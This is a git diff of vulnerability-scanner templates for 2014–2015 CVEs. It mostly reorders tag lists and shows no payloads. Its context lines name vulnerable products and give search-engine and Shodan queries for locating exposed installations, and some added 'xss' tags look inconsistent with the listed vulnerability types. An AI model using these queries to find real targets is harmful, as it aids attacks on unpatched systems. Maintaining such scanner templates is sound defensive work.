a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index facf173194..ebc4f29d7f 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -27,7 +27,7 @@ info: product: ninja framework: wordpress google-query: inurl:"/wp-content/plugins/shortcode-ninja" - tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth,visualshortcodes + tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,visualshortcodes http: - method: GET diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 1f24b30292..03cabd6a74 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -26,7 +26,7 @@ info: vendor: cybercompany product: swipehq-payment-gateway-woocommerce framework: wordpress - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany + tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany http: - method: GET diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index bfb094135e..f59c4519ad 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -26,7 +26,7 @@ info: vendor: ultimate-weather_project product: ultimate-weather framework: wordpress - tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project + tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project http: - method: GET diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 8cc9104ae9..c0f00b111e 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -26,7 +26,7 @@ info: product: wp-planet framework: wordpress google-query: inurl:"/wp-content/plugins/wp-planet" - tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth,czepol + tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,czepol http: - raw: diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 5cf2ff65ff..b8b0170124 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -27,7 +27,7 @@ info: product: tera-charts framework: wordpress google-query: inurl:"/wp-content/plugins/tera-charts" - tags: cve,cve2014,wordpress,wp-plugin,lfi,tera_charts_plugin_project + tags: cve2014,cve,wordpress,wp-plugin,lfi,tera_charts_plugin_project http: - method: GET diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index a2a410c66a..7f380a4a2d 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -29,7 +29,7 @@ info: vendor: levelfourdevelopment product: wp-easycart framework: wordpress - tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment + tags: cve2014,cve,wpscan,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment http: - method: GET diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 20a3c68cea..0ef4a45efd 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: netfortris product: trixbox - tags: packetstorm,cve,cve2014,lfi,trixbox,edb,netfortris + tags: cve2014,cve,packetstorm,lfi,trixbox,edb,netfortris,xss http: - method: GET diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 392924b8c1..4bae479e7d 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: webedition product: webedition_cms - tags: edb,packetstorm,cve,cve2014,lfi,webedition + tags: cve2014,cve,edb,packetstorm,lfi,webedition http: - method: GET diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 34942a093e..6c504821de 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -28,7 +28,7 @@ info: product: wp_content_source_control framework: wordpress google-query: inurl:"/wp-content/plugins/wp-source-control" - tags: cve,cve2014,wordpress,wp-plugin,lfi,edb,seclists,wp_content_source_control_project + tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,seclists,wp_content_source_control_project http: - method: GET diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index 1a0a403296..d58f399c61 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -27,7 +27,7 @@ info: max-request: 8 vendor: gnu product: bash - tags: cve,cve2014,rce,shellshock,kev,gnu + tags: cve2014,cve,rce,shellshock,kev,gnu http: - method: GET diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index 1eaffcd068..ecdcaa0924 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -30,7 +30,7 @@ info: vendor: rejetto product: http_file_server shodan-query: http.favicon.hash:2124459909 - tags: packetstorm,msf,cve,cve2014,hfs,rce,kev,rejetto + tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto variables: str1: '{{rand_base(6)}}' str2: 'CVE-2014-6287' diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 7c5e4528d2..3e5fdbd19f 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: osclass product: osclass - tags: cve,cve2014,lfi,packetstorm,osclass + tags: cve2014,cve,lfi,packetstorm,osclass http: - method: GET diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 097d139294..a33951c010 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: soplanning product: soplanning - tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi + tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss http: - method: GET diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index b796dc21a7..c320c263c7 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -29,7 +29,7 @@ info: vendor: gogits product: gogs shodan-query: title:"Sign In - Gogs" - tags: gogs,seclists,packetstorm,edb,cve,cve2014,sqli,gogits + tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits http: - method: GET diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 2bd03dd962..29d054d44e 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -29,7 +29,7 @@ info: product: dukapress framework: wordpress google-query: inurl:"/wp-content/plugins/dukapress" - tags: cve,cve2014,wordpress,wp-plugin,lfi,edb,dukapress + tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,dukapress http: - method: GET diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 8228f76137..650c8c9187 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -27,7 +27,7 @@ info: product: video_gallery framework: wordpress google-query: inurl:"/wp-content/plugins/dzs-videogallery" - tags: cve2014,wordpress,xss,wp-plugin,seclists,cve,digitalzoomstudio + tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio http: - method: GET diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 4d8ec043d4..39068d6730 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -29,7 +29,7 @@ info: vendor: db_backup_project product: db_backup framework: wordpress - tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project + tags: cve2014,cve,lfi,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project http: - method: GET diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 7632df9825..a35c3f1f13 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -25,7 +25,7 @@ info: vendor: eleanor-cms product: eleanor_cms shodan-query: html:"eleanor" - tags: packetstorm,cve,cve2014,eleanor,cms,redirect,eleanor-cms + tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms http: - method: GET diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 85b035104f..f3c918a845 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -26,7 +26,7 @@ info: vendor: frontend_uploader_project product: frontend_uploader framework: wordpress - tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth,frontend_uploader_project + tags: cve2014,cve,wp-plugin,xss,wpscan,packetstorm,wordpress,unauth,frontend_uploader_project http: - method: GET diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index cb463199e7..3d83f0d46d 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve2014,netsweeper,xss,packetstorm,cve + tags: cve2014,cve,netsweeper,xss,packetstorm http: - method: GET diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 6b2e3c8af0..86bf6ae4f7 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: packetstorm,cve,cve2014,netsweeper,xss + tags: cve2014,cve,packetstorm,netsweeper,xss http: - method: GET diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 4cdf4b7ca7..7c2e136e09 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve,cve2014,netsweeper,xss,packetstorm + tags: cve2014,cve,netsweeper,xss,packetstorm http: - method: GET diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index a255366ae5..cc936ae0ce 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve2014,netsweeper,lfi,packetstorm,cve + tags: cve2014,cve,netsweeper,lfi,packetstorm,xss http: - method: GET diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 45d2332e61..19d25db5c1 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve,cve2014,netsweeper,default-login,packetstorm + tags: cve2014,cve,netsweeper,default-login,packetstorm,xss http: - raw: diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index c891e01855..cec74dfb2d 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve,cve2014,netsweeper,xss,packetstorm + tags: cve2014,cve,netsweeper,xss,packetstorm http: - method: GET diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 8b13e03998..4bb9006e37 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve,cve2014,netsweeper,redirect,packetstorm + tags: cve2014,cve,netsweeper,redirect,packetstorm,xss http: - method: GET diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index a95fd3fa6a..86022aee37 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve2014,netsweeper,auth-bypass,packetstorm,edb,cve + tags: cve2014,cve,netsweeper,auth-bypass,packetstorm,edb,xss http: - method: GET diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 40e9571c47..08ee4eb798 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: adb product: p.dga4001n_firmware - tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015,adb + tags: cve2015,cve,pirelli,router,disclosure,edb,packetstorm,adb http: - method: GET diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index ed924e1d46..9de852b90c 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -27,7 +27,7 @@ info: vendor: candidate-application-form_project product: candidate-application-form framework: wordpress - tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp,candidate-application-form_project + tags: cve2015,cve,wpscan,wordpress,wp-plugin,lfi,wp,candidate-application-form_project http: - method: GET diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 379b30606c..d7178f2787 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -28,7 +28,7 @@ info: vendor: simple-image-manipulator_project product: simple-image-manipulator framework: wordpress - tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp,simple-image-manipulator_project + tags: cve2015,cve,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,simple-image-manipulator_project http: - method: GET diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index 7bb0f2724e..2ca4521c5a 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -28,7 +28,7 @@ info: product: mypixs framework: wordpress google-query: inurl:"/wp-content/plugins/mypixs" - tags: cve2015,wordpress,wp-plugin,lfi,wpscan,cve,mypixs_project + tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,mypixs_project http: - method: GET diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index ad69e1dce4..45efa3e4a6 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: elasticsearch product: elasticsearch - tags: packetstorm,cve,cve2015,elastic,rce,elasticsearch,kev + tags: cve2015,cve,packetstorm,elastic,rce,elasticsearch,kev http: - raw: diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 4d92c3fe50..350c97fdd5 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -27,7 +27,7 @@ info: vendor: icewarp product: mail_server shodan-query: title:"icewarp" - tags: lfi,mail,packetstorm,cve,cve2015,icewarp + tags: cve2015,cve,lfi,mail,packetstorm,icewarp http: - method: GET diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index e0a4128139..dbdf828114 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -30,7 +30,7 @@ info: product: divi framework: wordpress google-query: inurl:/wp-content/plugins/revslider - tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015,elegant_themes + tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes http: - method: GET diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index c466aac4d6..4309a49761 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: fortinet product: fortios - tags: cve,cve2015,xss,fortigates,intrusive,fortinet + tags: cve2015,cve,xss,fortigates,intrusive,fortinet http: - method: GET diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 8949bbf278..c279344bbb 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -27,7 +27,7 @@ info: product: magmi framework: magento_server shodan-query: http.component:"Magento" - tags: plugin,edb,packetstorm,cve,cve2015,lfi,magento,magmi,magmi_project,magento_server + tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server http: - method: GET diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index d7e391a72c..01ae66214a 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -28,7 +28,7 @@ info: product: magmi framework: magento_server shodan-query: http.component:"Magento" - tags: plugin,edb,packetstorm,cve,cve2015,magento,magmi,xss,magmi_project,magento_server + tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server http: - method: GET diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index a581c39e14..c4fb4941b2 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: fedoraproject product: fedora - tags: cve,cve2015,jetty,packetstorm,fedoraproject + tags: cve2015,cve,jetty,packetstorm,fedoraproject http: - method: POST diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 5b19002618..7a54e724da 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: ericsson product: drutt_mobile_service_delivery_platform - tags: cve,cve2015,lfi,ericsson,edb,packetstorm + tags: cve2015,cve,lfi,ericsson,edb,packetstorm http: - method: GET diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 40d2f4671d..0263fb3235 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -28,7 +28,7 @@ info: vendor: web-dorado product: spider_calendar framework: wordpress - tags: wordpress,wp,sqli,cve2015,wpscan,wp-plugin,spider-event-calendar,unauth,edb,cve,web-dorado + tags: cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado http: - raw: diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index dcd3cf0360..7e064e628a 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -30,7 +30,7 @@ info: vendor: ab_google_map_travel_project product: ab_google_map_travel framework: wordpress - tags: cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,cve,ab_google_map_travel_project + tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,ab_google_map_travel_project http: - raw: diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index fe3ac288a1..3776436862 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -23,7 +23,7 @@ info: product: dotnetnuke verified: true fofo-query: app="DotNetNuke" - tags: cve,cve2015,dotnetnuke,auth-bypass,install + tags: cve2015,cve,dotnetnuke,auth-bypass,install http: - method: GET diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 416ca5e50a..d0939a1983 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -29,7 +29,7 @@ info: product: navis_documentcloud framework: wordpress google-query: inurl:"/wp-content/plugins/navis-documentcloud" - tags: cve,cve2015,wordpress,wp-plugin,xss,documentcloud + tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud http: - method: GET diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 868a79a466..ce8dc518be 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: kaseya product: virtual_system_administrator - tags: cve,cve2015,redirect,kaseya + tags: cve2015,cve,redirect,kaseya http: - method: GET diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 1f1fb1103b..06b8982704 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -28,7 +28,7 @@ info: vendor: sysaid product: sysaid shodan-query: http.favicon.hash:1540720428 - tags: cve,cve2015,sysaid,lfi,seclists + tags: cve2015,cve,sysaid,lfi,seclists http: - method: GET diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index acf69a11a0..c9680084d0 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -30,7 +30,7 @@ info: vendor: tp-link product: tl-wr841n_\(9.0\)_firmware shodan-query: http.title:"TP-LINK" - tags: router,lfi,seclists,cve,cve2015,tplink,kev,tp-link + tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link http: - method: GET diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index 7f2a2eb4fe..42154ba366 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: rubyonrails product: web_console - tags: ruby,hackerone,cve,cve2015,rce,rails,intrusive,rubyonrails + tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails http: - method: GET diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index ad4e273dfd..6183272fe9 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: elasticsearch product: elasticsearch - tags: packetstorm,edb,cve,cve2015,elastic,lfi,elasticsearch,plugin + tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin http: - method: GET diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index fbbe025d59..1548ec61b5 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: montala product: resourcespace - tags: lfi,resourcespace,packetstorm,cve,cve2015,montala + tags: cve2015,cve,lfi,resourcespace,packetstorm,montala http: - method: GET diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index caf7533128..11a1e36b47 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: bonitasoft product: bonita_bpm_portal - tags: unauth,packetstorm,cve,cve2015,bonita,lfi,bonitasoft + tags: cve2015,cve,unauth,packetstorm,bonita,lfi,bonitasoft http: - method: GET diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index be416ec975..6404bacdaa 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: sensiolabs product: symfony - tags: cve,cve2015,symfony,rce,sensiolabs + tags: cve2015,cve,symfony,rce,sensiolabs http: - method: GET diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index c7161a01c7..e2270b1513 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -30,7 +30,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: authenticated,cve,sqli,wp-plugin,newstatpress,packetstorm,cve2015,wordpress,wp,newstatpress_project + tags: cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project http: - raw: diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index fa067736ff..9644ef528f 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -29,7 +29,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project + tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project http: - raw: diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 32ba0bee7f..fdf9a085aa 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -27,7 +27,7 @@ info: vendor: helpdesk_pro_project product: helpdesk_pro framework: joomla\! - tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin,helpdesk_pro_project,joomla\! + tags: cve2015,cve,lfi,packetstorm,edb,joomla,plugin,helpdesk_pro_project,joomla\!,xss http: - method: GET diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 0a060051c8..b1aeefb0c4 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -28,7 +28,7 @@ info: vendor: church_admin_project product: church_admin framework: wordpress - tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss,church_admin_project + tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project http: - method: GET diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index b9bedd10b8..b7298e69df 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -29,7 +29,7 @@ info: product: se_html5_album_audio_player framework: wordpress google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player" - tags: cve,cve2015,wordpress,wp-plugin,lfi,edb,packetstorm,se_html5_album_audio_player_project + tags: cve2015,cve,wordpress,wp-plugin,lfi,edb,packetstorm,se_html5_album_audio_player_project http: - method: GET diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 4cb0a7f5b0..83d105b60b 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: koha product: koha - tags: cve,cve2015,lfi,edb,koha + tags: cve2015,cve,lfi,edb,koha http: - method: GET diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index dc4d739857..a0583d8a1b 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: xceedium product: xsuite - tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015 + tags: cve2015,cve,xceedium,xsuite,lfi,packetstorm,xss http: - method: GET diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index c65d9fe3bd..40c245547f 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: xceedium product: xsuite - tags: cve,cve2015,redirect,xsuite,xceedium,edb + tags: cve2015,cve,redirect,xsuite,xceedium,edb http: - method: GET diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 2520deca2c..c2b5f0f72a 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -29,7 +29,7 @@ info: product: zip_attachments framework: wordpress google-query: inurl:"/wp-content/plugins/zip-attachments" - tags: cve2015,wp-plugin,wpscan,lfi,wordpress,cve,zip_attachments_project + tags: cve2015,cve,wp-plugin,wpscan,lfi,wordpress,zip_attachments_project http: - method: GET diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 7268acf731..9521f1761b 